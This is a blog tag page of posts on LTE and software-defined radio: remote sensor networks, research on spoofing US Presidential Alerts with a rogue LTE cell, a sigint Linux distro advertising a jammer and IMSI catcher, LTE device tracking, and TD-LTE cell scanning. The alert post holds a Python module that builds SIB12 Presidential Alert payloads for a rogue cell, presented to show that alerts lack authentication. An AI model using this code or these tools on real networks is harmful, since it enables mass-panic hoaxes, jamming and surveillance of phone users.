Tagged: LTE

Electrosense+: Global Network of RTL-SDR Sensors with Decoding of FM/AM ADS-B AIS LTE ACARS

Back in late 2019 we posted about the Electrosense network which is an open source project aiming to deploy radio spectrum sensors worldwide. The idea is to help analyze and understand radio spectrum usage across the globe. Each sensor consists of an RTL-SDR, Raspberry Pi and an optional downconverter to receive the higher bands.

Recently Dr. Sofie Pollen wrote in and informed us that Electrosense has been upgraded: users can now use any sensor on the network to decode signals remotely over a web browser. The currently supported demodulators/decoders are FM/AM, ADS-B, AIS, LTE base station info and ACARS. This makes the Electrosense network similar to the KiwiSDR or OpenWebRX SDR networks, which also have various decoders built into the web software.

To test it out you need to create an Electrosense account at electrosense.org. Once logged in, go to "My Electrosense" on the top right and choose "Spectrum Decoder". You can then choose from sensors hosted by Electrosense contributors around the world. Once the waterfall is displayed you can click on signals to decode and listen to them, or change the decoder. Changing to ADS-B or AIS brings up a map with decoded aircraft or boat positions. Changing to ACARS or LTE shows a text window with the decoded information.

A full Electrosense kitset can be purchased from Jetvision; however, Sofie notes that they do ship free sensors to some people who cannot afford the kit, and you can apply via this link to increase coverage in your area.

Currently active Electrosense sensors
Electrosense web GUI decoding a wideband FM signal

Using a Software Defined Radio to Send Fake Presidential Alerts over LTE

Modern cell phones in the USA are all required to support the Wireless Emergency Alert (WEA) program, which allows citizens to receive urgent messages like AMBER (child abduction) alerts, severe weather warnings and Presidential Alerts.

In January 2018 an incoming missile alert was accidentally issued to residents in Hawaii, resulting in panic and disruption. More recently an unblockable Presidential Alert test message was sent to all US phones. These events have prompted researchers at the University of Colorado Boulder to investigate concerns over how this alert system could be hacked, potentially allowing bad actors to cause mass panic on demand (SciHub Paper).

Their research showed that four low cost TX capable software defined radios (USRP or bladeRF) with 1 watt output each, combined with open source LTE base station software, could be used to send a fake Presidential Alert to a stadium of 50,000 people (note that the stadium scenario was only simulated; the real world tests were performed responsibly in a controlled environment). The attack works by running a fake, malicious LTE cell on the SDR that nearby phones camp on. Once a phone has camped on the rogue cell, an alert can easily be crafted and broadcast to every phone on it. The phone has no way to verify that the alert is legitimate: WEA messages are delivered as part of the cell's system information broadcast, which carries no signature or other authentication, so whichever cell the phone is camped on can deliver one.
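As an added example (not the Boulder team's code, nor code from any LTE stack), here is the alert payload in the form LTE carries it: the SIB12 fields and the TS 23.041 warning-message pages inside them, built on the rogue-cell side and then parsed the way a handset does. Field layouts follow 3GPP TS 36.331 (SIB12) and TS 23.041 (serial number, page container, GSM 7-bit packing); the CMAS message identifier table is limited to three entries, the character set is limited to the ASCII-identical part of the GSM 7-bit alphabet, and the alert text is constructed. What it shows is that every field is plain data: there is no signature, MAC or sender identity anywhere for the phone to check, so the message identifier alone decides that a phone renders a Presidential Alert.

```python
"""SIB12 alert payload: built on the rogue-cell side, parsed as a handset does.
Added example; layouts from 3GPP TS 36.331 (SIB12) and TS 23.041 (pages,
serial number, GSM 7-bit packing).  Constructed data, not captured traffic."""
from dataclasses import dataclass

PAGE_OCTETS = 82                          # TS 23.041 9.3.35: one CB data page
SEPTETS_PER_PAGE = PAGE_OCTETS * 8 // 7   # 93 GSM 7-bit characters per page
GSM7_PAD = 0x0D                           # CR pads unused septets in a page
DCS_GSM7_DEFAULT = 0x00                   # TS 23.038 data coding scheme value

# CMAS message identifiers (TS 23.041 9.4.1.2.2); subset used by this example.
MESSAGE_IDENTIFIERS = {
    4370: "Presidential Level Alert",
    4379: "Child Abduction Emergency (AMBER)",
    4380: "Required Monthly Test",
}


@dataclass
class Sib12:
    message_identifier: int         # 16 bits: picks the alert class
    serial_number: int              # 16 bits: GS(2) | message code(10) | update(4)
    data_coding_scheme: int         # 1 octet, TS 23.038
    warning_message_segment: bytes  # TS 23.041 9.3.35 page container


def build_serial_number(geo_scope: int, message_code: int, update: int) -> int:
    if not (0 <= geo_scope < 4 and 0 <= message_code < 1024 and 0 <= update < 16):
        raise ValueError("serial number field out of range")
    return (geo_scope << 14) | (message_code << 4) | update


def parse_serial_number(serial: int) -> tuple:
    return (serial >> 14) & 0x3, (serial >> 4) & 0x3FF, serial & 0xF


def _septet(ch: str) -> int:
    """Only characters whose GSM 7-bit code equals their ASCII code."""
    o = ord(ch)
    if 0x20 <= o <= 0x23 or 0x25 <= o <= 0x3F or 0x41 <= o <= 0x5A or 0x61 <= o <= 0x7A:
        return o
    raise ValueError(f"{ch!r} is outside the ASCII-identical subset of GSM 7-bit")


def gsm7_pack(septets) -> bytes:
    """Pack 7-bit values LSB-first into octets (TS 23.038 6.1.2.1.1)."""
    out, buf, nbits = bytearray(), 0, 0
    for s in septets:
        buf |= (s & 0x7F) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(buf & 0xFF)
            buf >>= 8
            nbits -= 8
    if nbits:
        out.append(buf & 0xFF)
    return bytes(out)


def gsm7_unpack(data: bytes, count: int) -> list:
    """Inverse of gsm7_pack: recover up to `count` septets from `data`."""
    out, buf, nbits = [], 0, 0
    for b in data:
        buf |= b << nbits
        nbits += 8
        while nbits >= 7 and len(out) < count:
            out.append(buf & 0x7F)
            buf >>= 7
            nbits -= 7
    return out


def encode_warning_content(text: str) -> bytes:
    """Number-of-pages octet, then per page: 82 data octets + 1 length octet."""
    septets = [_septet(c) for c in text]
    pages = [septets[i:i + SEPTETS_PER_PAGE]
             for i in range(0, max(len(septets), 1), SEPTETS_PER_PAGE)]
    out = bytearray([len(pages)])
    for page in pages:
        padded = page + [GSM7_PAD] * (SEPTETS_PER_PAGE - len(page))
        out += gsm7_pack(padded)[:PAGE_OCTETS]
        out.append((len(page) * 7 + 7) // 8)   # octets that carry real text
    return bytes(out)


def decode_warning_content(payload: bytes) -> str:
    n_pages = payload[0]
    if len(payload) != 1 + n_pages * (PAGE_OCTETS + 1):
        raise ValueError("warning message content has the wrong length")
    text = []
    for i in range(n_pages):
        start = 1 + i * (PAGE_OCTETS + 1)
        used = payload[start + PAGE_OCTETS]
        septets = gsm7_unpack(payload[start:start + used], used * 8 // 7)
        while septets and septets[-1] == GSM7_PAD:   # strip page padding
            septets.pop()
        text.append("".join(chr(s) for s in septets))
    return "".join(text)


def craft_alert(text: str, message_identifier: int = 4370,
                message_code: int = 1, update: int = 0) -> Sib12:
    """Everything the rogue cell needs; note that no key is involved."""
    serial = build_serial_number(3, message_code, update)   # GS 3 = cell wide
    return Sib12(message_identifier, serial, DCS_GSM7_DEFAULT,
                 encode_warning_content(text))


def handset_view(sib: Sib12) -> dict:
    """What a UE can learn from SIB12 alone: no signature, MAC or sender
    field exists, so the message identifier by itself selects the alert class."""
    if sib.data_coding_scheme != DCS_GSM7_DEFAULT:
        raise NotImplementedError("only the GSM 7-bit default alphabet is handled")
    gs, code, update = parse_serial_number(sib.serial_number)
    return {"class": MESSAGE_IDENTIFIERS.get(sib.message_identifier, "other"),
            "geo_scope": gs, "message_code": code, "update_number": update,
            "text": decode_warning_content(sib.warning_message_segment)}
```

`handset_view(craft_alert("Presidential Alert: THIS IS A TEST"))` returns the class "Presidential Level Alert" and the text, and nothing in the `Sib12` it consumed could have told it which operator, if any, was behind the cell. A defender's only handle is therefore the cell itself (unexpected PLMN/PCI/frequency, a cell that appears and vanishes), not the alert.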

Spoofed Presidential Alerts Received on a Galaxy S8 and iPhone X.

SigintOS: A Linux Distro for Signal Intelligence

Recently we've heard of a new Linux distribution called SigintOS becoming available for download. SigintOS is an Ubuntu based distribution with a number of built in signal intelligence applications for software defined radios, from the receive-only RTL-SDR to TX capable SDRs like the HackRF, bladeRF and USRP radios.

The distro appears to be very well executed, with a built in GUI that grants easy access to some common sigint tools like an FM and GPS transmitter, a jammer, a GSM base station search tool and an IMSI catcher. SigintOS also comes with various other preinstalled programs such as GNU Radio, gr-gsm, YateBTS, Wireshark and GQRX.

The OS also teases an LTE search tool and an LTE decoder; to access them you have to get in contact with the creators, presumably for a licencing fee. Regarding an LTE IMSI catcher they write:

LTE IMSI Catcher is not a myth!

Due to the nature of LTE base stations, the capture of IMSI numbers seems impossible. LTE stations use the GUTI to communicate with users instead of the IMSI. The GUTI contains the temporary IMSI number called the T-IMSI. This allows the operator, who is authorized to query T-IMSI information, to find out who is at the corresponding LTE station.

Can the GUTI number be found?
Answer Yes!

How to find GUTI and T-IMSI numbers?
They can be found with the help of SigintOS …

For detailed information [email protected]

The image comes as a 2 GB ISO file, and it's possible to run it in VMware or VirtualBox.

SigintOS IMSI Catcher

Upcoming Book “Inside Radio: An Attack and Defense Guide”

Unicorn Team are information security researchers who also frequently work on wireless security research. Recently they have been promoting their upcoming textbook titled "Inside Radio: An Attack and Defense Guide".

Judging from the blurb and the released table of contents, the book looks to be an excellent introduction for anyone interested in today's wireless security issues. It covers topics such as RFID, Bluetooth, ZigBee, GSM, LTE and GPS. In regards to SDRs, the book specifically covers the RTL-SDR, HackRF, bladeRF and LimeSDR and their role in wireless security research. They also probably reference and show how to use those SDRs in the chapters about replay attacks, ADS-B security risks, and GSM security.

The book is yet to be released and is currently available for pre-order on Amazon or Springer for US$59.99. The expected release date is May 9, 2018, and copies will also be for sale at the HITB SECCONF 2018 conference during 9 - 13 April in Amsterdam.

The blurb and released contents are pasted below. See their promo page for the full contents list:

This book discusses the security issues in a wide range of wireless devices and systems, such as RFID, Bluetooth, ZigBee, GSM, LTE, and GPS. It collects the findings of recent research by the UnicornTeam at 360 Technology, and reviews the state-of-the-art literature on wireless security. The book also offers detailed case studies and theoretical treatments – specifically it lists numerous laboratory procedures, results, plots, commands and screenshots from real-world experiments. It is a valuable reference guide for practitioners and researchers who want to learn more about the advanced research findings and use the off-the-shelf tools to explore the wireless world.

Qing YANG is the founder of UnicornTeam & the head of the Radio Security Research Department at 360 Technology. He has vast experience in the information security area. He has presented at Black Hat, DEFCON, CanSecWest, HITB, Ruxcon, POC, XCon, China ISC etc.

Lin HUANG is a senior wireless security researcher and SDR technology expert at 360 Technology. Her interests include security issues in wireless communication, especially cellular network security. She was a speaker at Black Hat, DEFCON, and HITB security conferences. She is 360 Technology’s 3GPP SA3 delegate.

This book is a joint effort by the entire UnicornTeam, including Qiren GU, Jun LI, Haoqi SHAN, Yingtao ZENG, and Wanqiao ZHANG etc.


DEFCON 23 – LTE Recon and Tracking with RTLSDR

Back on Dec 5 we posted about some DEF CON 23 talks that were released from the Wireless Village track. Recently more talks from other tracks have been released, and one of interest to our blog is the talk by Ian Kline titled “LTE Recon and Tracking with RTLSDR”. The talk’s blurb reads:

Since RTLSDR became a consumer grade RX device, numerous talks and open source tools enabled the community to monitor airplanes, ships, and cars… but come on, what we really want to track are cell phones. If you know how to run cmake and have $50 to pick up an RTLSDR-E4000, I’ll make sure you walk out of here with the power to monitor LTE devices around you on a slick Kibana4 dashboard. You’ll also get a primer on geolocating the devices if you’ve got a second E4000 and some basic soldering skills.

DEF CON 23 – Ian Kline – LTE Recon and Tracking with RTLSDR

Analyzing TD-LTE with the RTL-SDR

TD-LTE stands for Time Division Long Term Evolution. It is one of the two duplexing variants of LTE, the other being FDD-LTE (Frequency Division Duplex LTE): TD-LTE alternates uplink and downlink in time on a single frequency, while FDD-LTE uses separate uplink and downlink frequencies.

Over in China, where TD-LTE is commonly used, Jiao Xianjun found that the existing LTE-Cell-Scanner Linux program did not support TD-LTE, so he made a fork which does. LTE-Cell-Scanner decodes the broadcast data of LTE cell towers, which contains information like the cell ID, frequency and signal strength. With his modified LTE-Cell-Scanner, some MATLAB scripts he wrote and an RTL-SDR, Jiao was able to decode the cell information from 10 TD-LTE signals and 2 FDD-LTE signals. He has uploaded a video showing this too.
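To show the first step such a scanner performs, here is an added example (not code from LTE-Cell-Scanner or from Jiao's fork): it generates the three LTE primary synchronisation signal (PSS) sequences from the Zadoff-Chu definition in 3GPP TS 36.211 6.11.1.1 and recovers N_ID^(2) from a noisy copy by correlation. The "received" samples are constructed here with a random phase rotation and white noise rather than taken off the air, and the SSS stage that supplies N_ID^(1) is not implemented; the two together give the physical cell ID a scanner reports. The same three PSS sequences are used by TD-LTE and FDD-LTE cells; the duplexing mode is decided afterwards from where the PSS and SSS sit in the frame, which is the part Jiao's fork had to add.

```python
"""LTE cell search, step 1: find N_ID^(2) from the PSS by correlation.
Added example, not LTE-Cell-Scanner code.  PSS definition per 3GPP TS 36.211
6.11.1.1; the received samples are constructed here, not captured."""
import cmath
import math
import random

PSS_ROOTS = {0: 25, 1: 29, 2: 34}   # N_ID^(2) -> Zadoff-Chu root index u


def pss_sequence(n_id_2: int) -> list:
    """62 frequency-domain PSS symbols d_u(n); the DC carrier (n=31) is skipped."""
    u = PSS_ROOTS[n_id_2]
    seq = []
    for n in range(62):
        m = n * (n + 1) if n <= 30 else (n + 1) * (n + 2)
        seq.append(cmath.exp(-1j * math.pi * u * m / 63))
    return seq


def correlate(received: list, reference: list) -> float:
    """Normalised |<received, reference>|; a common phase rotation drops out."""
    acc = sum(r * ref.conjugate() for r, ref in zip(received, reference))
    return abs(acc) / len(reference)


def detect_n_id_2(received: list) -> tuple:
    """Try all three PSS and return (best N_ID^(2), metric per candidate)."""
    metrics = {k: correlate(received, pss_sequence(k)) for k in PSS_ROOTS}
    return max(metrics, key=metrics.get), metrics


def physical_cell_id(n_id_1: int, n_id_2: int) -> int:
    """PCI = 3*N_ID^(1) + N_ID^(2); N_ID^(1) (0..167) comes from the SSS."""
    if not (0 <= n_id_1 <= 167 and 0 <= n_id_2 <= 2):
        raise ValueError("identity out of range")
    return 3 * n_id_1 + n_id_2


def constructed_rx(n_id_2: int, snr_db: float, seed: int = 1) -> list:
    """Constructed channel: unknown phase offset plus complex white noise."""
    rng = random.Random(seed)
    sigma = math.sqrt(10 ** (-snr_db / 10) / 2)      # per real/imag component
    rotation = cmath.exp(1j * rng.uniform(0, 2 * math.pi))
    return [s * rotation + complex(rng.gauss(0, sigma), rng.gauss(0, sigma))
            for s in pss_sequence(n_id_2)]


if __name__ == "__main__":
    rx = constructed_rx(1, snr_db=3.0)
    best, metrics = detect_n_id_2(rx)
    print("N_ID(2) =", best, {k: round(v, 3) for k, v in metrics.items()})
    print("PCI if the SSS gave N_ID(1)=5:", physical_cell_id(5, best))
```

A real scanner runs this correlation in the time domain against every half-frame offset and frequency hypothesis before it knows where the PSS is; the frequency-domain version above is the same test once the symbol has been found and an FFT taken. The magnitude in `correlate` is what makes the check robust to the unknown carrier phase an RTL-SDR leaves on the samples.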

TD-LTE, LTE FDD, scanning/demodulation results in Beijing, China